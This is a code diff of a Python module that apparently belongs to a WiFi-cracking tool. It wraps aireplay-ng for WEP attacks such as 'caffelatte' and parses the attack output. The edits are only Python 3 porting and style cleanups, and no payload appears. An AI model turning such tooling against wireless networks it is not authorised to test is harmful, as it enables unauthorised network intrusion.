@@ -33,7 +33,7 @@ class WEPAttackType(object):
         self.value = None
         self.name = None
         if type(var) is int:
-            for (name, value) in WEPAttackType.__dict__.items():
+            for (name, value) in list(WEPAttackType.__dict__.items()):
                 if type(value) is int:
                     if value == var:
                         self.name = name
@@ -41,7 +41,7 @@ class WEPAttackType(object):
                         return
             raise Exception('Attack number %d not found' % var)
         elif type(var) is str:
-            for (name, value) in WEPAttackType.__dict__.items():
+            for (name, value) in list(WEPAttackType.__dict__.items()):
                 if type(value) is int:
                     if name == var:
                         self.name = name
@@ -105,7 +105,8 @@ class Aireplay(Thread, Dependency):
         self.xor_percent = '0%'
         while self.pid.poll() is None:
             time.sleep(0.1)
-            if not os.path.exists(self.output_file): continue
+            if not os.path.exists(self.output_file):
+                continue
             # Read output file & clear output file
             with open(self.output_file, 'r+') as fid:
                 lines = fid.read()
@@ -119,7 +120,8 @@ class Aireplay(Thread, Dependency):
 
             for line in lines.split('\n'):
                 line = line.replace('\r', '').strip()
-                if line == '': continue
+                if line == '':
+                    continue
                 if 'Notice: got a deauth/disassoc packet' in line:
                     self.error = 'Not associated (needs fakeauth)'
 
@@ -448,9 +450,9 @@ class Aireplay(Thread, Dependency):
 
 if __name__ == '__main__':
     t = WEPAttackType(4)
-    print(t.name, type(t.name), t.value)
+    print((t.name, type(t.name), t.value))
     t = WEPAttackType('caffelatte')
-    print(t.name, type(t.name), t.value)
+    print((t.name, type(t.name), t.value))
 
     t = WEPAttackType(t)
-    print(t.name, type(t.name), t.value)
+    print((t.name, type(t.name), t.value))
